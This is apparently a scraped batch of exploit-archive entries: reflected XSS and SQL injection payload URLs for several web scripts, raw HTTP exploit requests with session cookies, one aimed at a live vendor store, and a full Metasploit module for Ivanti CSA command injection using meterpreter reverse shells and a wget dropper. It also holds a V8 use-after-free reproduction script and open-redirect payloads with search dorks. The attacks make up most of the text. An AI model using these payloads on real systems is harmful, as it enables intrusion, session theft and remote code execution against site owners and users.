<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : inoutscripts.com │<br />│ Vendor : Inout Scripts - Nesote Technologies Private Limited │<br />│ Software : Inout Multi-Vendor Shopping Cart 3.2.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br />Method: GET<br /><br />URL parameter 'page' is vulnerable to XSS<br /><br />https://www.website.com/index.php?page=product%2fcouponsh446k%3cimg%20src%3da%20onerror%3dalert(1)%3eciqs8<br /><br /><br />URL parameter 'keyword' is vulnerable to XSS<br /><br />https://www.website.com/index.php?page=product/productviews&keyword=tv24708%22%3balert(1)%2f%2f279<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit<br />## Development: nu11secur1ty<br />## Date: 01.19.2023<br />## Vendor: https://slims.web.id/web/<br />## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2<br /><br />## Description:<br />The value of manual insertion `point 3` is copied into the HTML<br />document as plain text between tags.<br />The payload udz21<script>alert(1)</script>rk346 was submitted in<br />manual insertion point 3.<br />This input was echoed unmodified in the application's response.<br />The attacker can trick the already logged-in user, to visit the<br />exploit link that this attacker is created,<br />and if this already logged-in user is not actually IT or admin, this<br />will be the end of this system.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```<br />GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27<br />HTTP/1.1<br />Host: pwnedhost1.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;<br />SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/zd6e18)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/cross-site-scripting)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Cloud Services Appliance (CSA) Command Injection',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA)<br /> for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the<br /> Cloud Services Appliance before `4.6.0-512` allows an unauthenticated user to<br /> execute arbitrary code with limited permissions. Successful exploitation results<br /> in command execution as the `nobody` user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Jakub Kramarz', # Discovery<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-44529'],<br /> ['URL', 'https://forums.ivanti.com/s/article/SA-2021-12-02'],<br /> ['URL', 'https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529'],<br /> ['EDB', '50833'],<br /> ['PACKETSTORM', '166383']<br /> ],<br /> 'DisclosureDate' => '2021-12-02',<br /> 'Platform' => ['unix', 'linux', 'php'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'<br /> }<br /> }<br /> ],<br /> [<br /> 'PHP Command',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'printf', 'echo'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => '"' # We use this to denote the payload as a string so having it in the payload would escape things.<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> # Randomize the cookie pairs for the request.<br /> def randomize_cookie(payload)<br /> # Number of cookie pairs should be at least 4, and the first cookie pair should<br /> # always have the value 'ab'. Note that the Nth cookie in the request, where<br /> # N=no_of_cookies-2, should contain the payload.<br /> #<br /> # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=;<br /> # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=;<br /> no_of_cookies = rand(4..8)<br /> cookie_name = Rex::Text.rand_text_alphanumeric(1..8)<br /> payload_cookie_number = (no_of_cookies - 2)<br /> random_cookie = "#{cookie_name}=ab;"<br /> for cookie_no in 2..no_of_cookies do<br /> cookie_name = Rex::Text.rand_text_alphanumeric(1..8)<br /> if cookie_no == payload_cookie_number<br /> random_cookie << "#{cookie_name}=#{payload};"<br /> else<br /> random_cookie << "#{cookie_name}=;"<br /> end<br /> end<br /><br /> return random_cookie<br /> end<br /><br /> def check_vuln<br /> # check RCE by grabbing CSA version banner stored on /etc/LDBUILD<br /> payload = Base64.strict_encode64('readfile("/etc/LDBUILD");')<br /> cookie_payload = randomize_cookie(payload)<br /><br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),<br /> 'cookie' => cookie_payload.to_s<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> return nil<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> case target['Type']<br /> when :unix_cmd<br /> payload = Base64.strict_encode64("system(\"#{cmd}\");")<br /> when :php_cmd<br /> payload = Base64.strict_encode64(cmd.to_s)<br /> when :linux_dropper<br /> payload = Base64.strict_encode64("system(\"#{cmd}\");")<br /> end<br /> cookie_payload = randomize_cookie(payload)<br /><br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),<br /> 'cookie' => cookie_payload.to_s<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = check_vuln<br /> return CheckCode::Unknown('No response received from the target.') unless res<br /> return CheckCode::Safe unless res.code == 200 && !res.body.blank? && res.body =~ /<c123>/<br /><br /> begin<br /> parsed_html = Nokogiri::HTML.parse(res.body)<br /> rescue Nokogiri::SyntaxError => e<br /> return CheckCode::Unknown("Unable to parse the HTTP response! Error: #{e}")<br /> end<br /> csa_version = parsed_html.at_css('c123')<br /> if csa_version&.text&.blank?<br /> CheckCode::Vulnerable('Could not retrieve version.')<br /> else<br /> CheckCode::Vulnerable("Version: #{csa_version.text}")<br /> end<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :unix_cmd<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :php_cmd<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}")<br /> execute_cmdstager(linemax: 262144)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Jettweb.net │<br />│ Vendor : Jettweb │<br />│ Software : Jettweb Ready Rent A Car Script V4 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />URL parameter 'id' is vulnerable to XSS<br /><br />Path: /rezervasyon.php<br /><br />https://example/rezervasyon.php?id=3mteyx%22%3e%3cscript%3ealert(1)%3c%2fscript%3esih3w<br /><br />[-] Done<br /></code></pre>
<pre><code>Chrome: Copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess<br /><br />VULNERABILITY DETAILS<br />Copy-on-write is one of V8's internal optimization features that allows multiple JavaScript objects to share the same element store. This feature is primarily used to optimize creation of JavaScript arrays from literals. It's important that every function that can add a new element to a JS object or modify an existing one first checks that the element store isn't marked as COW and makes a copy of the store if needed. Otherwise, the element will be unexpectedly changed for every object that uses the same store.<br /><br />Consider the implementation of the safety check in `JSNativeContextSpecialization::BuildElementAccess`:<br /><br />```<br />JSNativeContextSpecialization::ValueEffectControl<br />JSNativeContextSpecialization::BuildElementAccess(<br /> Node* receiver, Node* index, Node* value, Node* effect, Node* control,<br /> Node* context, ElementAccessInfo const& access_info,<br /> KeyedAccessMode const& keyed_mode) {<br />[...]<br /> if (keyed_mode.access_mode() == AccessMode::kStore &&<br /> IsSmiOrObjectElementsKind(elements_kind) &&<br /> !IsCOWHandlingStoreMode(keyed_mode.store_mode())) {<br /> effect = graph()->NewNode(<br /> simplified()->CheckMaps(<br /> CheckMapsFlag::kNone,<br /> ZoneHandleSet<Map>(factory()->fixed_array_map())),<br /> elements, effect, control);<br /> }<br />[...]<br />}<br />```<br /><br />The `CheckMaps` node is only inserted if the current access mode is `kStore`. However, there are other modes that can also result in storing an element, and one of them is `kDefine`. A call to the `Object.defineProperty` function won't lead to an access in this mode, but an attacker can take advantage of class field initialization to trigger it:<br /><br />```<br />function ReturnHolder() { return define_property_holder }<br />class Trigger extends ReturnHolder { 123 = new_value; }<br />```<br /><br />The `Trigger` constructor will perform an element access that's equivalent to the expression `define_property_holder[123] = new_value`, but will set the access mode to `kDefine`, thus bypassing the safety check.<br /><br />There are likely multiple ways to exploit the issue. The approach the attached reproduction case takes is to create two `PACKED_SMI_ELEMENTS` arrays that share the element store and then get one of the arrays to transition to the `PACKED_ELEMENTS` kind and store a `HeapObject` element. Since copying elements from the corrupted Smi array to another Smi array won't trigger any write barriers, we can hide the pointer from the garbage collector in a new array and trigger a use-after-free on a V8 heap address.<br /><br /><br />VERSION<br />V8 version 10.9.0 (candidate)<br />Google Chrome 107.0.5304.87 (Official Build) (64-bit)<br /><br /><br />REPRODUCTION CASE<br />```<br />function ForceGC() { try { new ArrayBuffer(2 ** 34); } catch {} }<br /><br />old_space_array = Array(1, 2);<br /><br />function CopyElement(from, to) { to[0] = from[0]; } // no write barrier for smi arrays<br />for (let i = 0; i < 10000; ++i) {<br /> CopyElement(old_space_array, old_space_array);<br />}<br /><br />ForceGC();<br /><br />function MakeCOW() { return [0]; }<br />original_cow_object = MakeCOW();<br /><br />function MakeCopy() {<br /> let copy = original_cow_object.concat(); // create a new object with COW elements<br /> copy.splice(); // copy the elements<br /> return copy;<br />}<br /><br />new_value = 1;<br />new_value = {}; // mark the cell as mutable<br /><br />function ReturnHolder() { return define_property_holder }<br />class Trigger extends ReturnHolder { 0 = new_value; }<br /><br />for (let i = 0; i < 10000; ++i) {<br /> define_property_holder = MakeCopy();<br /> new Trigger();<br />}<br /><br />new_value = {};<br />define_property_holder = MakeCOW();<br />new Trigger();<br /><br />new_space_array = MakeCOW();<br />new_space_array.splice();<br /><br />CopyElement(new_space_array, old_space_array);<br /><br />new_value = \"\";<br />define_property_holder = MakeCOW();<br />new Trigger();<br /><br />new_space_array = null;<br />ForceGC();<br /><br />console.log(old_space_array[0][0]);<br /><br />```<br /><br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-06.<br /><br /><br /><br /><br /><br />Found by: glazunov@google.com<br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Activeitzone.com │<br />│ Vendor : ActiveITzone │<br />│ Software : Active eCommerce CMS 6.5.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /ecommerce/search<br /><br />GET parameter 'keyword' is vulnerable to SQLI<br /><br />https://www.website.com/ecommerce/search?selected_attribute_values%5B%5D=M&selected_attribute_values%5B%5D=Chenille&color=%23CD5C5C&keyword=G502[INJECT-HERE]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : Jettweb.net │<br />│ Vendor : Jettweb │<br />│ Software : PHP Hazır Haber Sitesi Scripti V3 - PHP Instant News Site (HaberScript03) │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /fonksiyonlar.php<br /><br />POST parameter 'haberid' is vulnerable to SQLI<br /><br />https://www.website.com/fonksiyonlar.php?fgit=yorumlar&haberid=95[SQL-Inject-HERE]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: zstore-6.5.4 - XSS-Reflected<br />## Development: nu11secur1ty<br />## Date: 01.18.2023<br />## Vendor: https://zippy.com.ua/<br />## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4<br />## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4<br /><br />## Description:<br />The value of manual insertion point 1 is copied into the HTML document<br />as plain text between tags.<br />The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in<br />the manual insertion point 1.<br />This input was echoed unmodified in the application's response.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```GET<br />GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a<br />HTTP/2<br />Host: store.zippy.com.ua<br />Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />```<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tplz84)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/cross-site-scripting/reflected)<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch 3.7.5 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/wptouch/ | <br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing<br /> However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device<br /> Desktop browsing does not allow you to convert<br /> But if we use the payload then it is possible.<br /> <br /> This URL Redirection vulnerability allows remote <br /> Attackers to redirect users to arbitrary websites and conduct phishing attacks<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br />[+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - WPtouch 4.3.47 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://wordpress.org/plugins/wptouch/ | <br />| # Dork : wp-content/plugins/wptouch/ |<br />====================================================================================================================================<br /><br />P0C :<br /><br />== Description ==<br /><br /> WPtouch is a mobile plugin for WordPress that automatically adds a simple and elegant mobile theme for mobile visitors to your WordPress website.<br /> When you activate the plugin and set it up, it allows the site visitor to view it according to the device used for browsing<br /> However, when connected to a mobile device, Plugins allows you to switch the display between a desktop or a mobile device<br /> Desktop browsing does not allow you to convert<br /> But if we use the payload then it is possible.<br /> <br /> This URL Redirection vulnerability allows remote <br /> Attackers to redirect users to arbitrary websites and conduct phishing attacks<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : ?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br />[+] https://127.0.0.1/incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>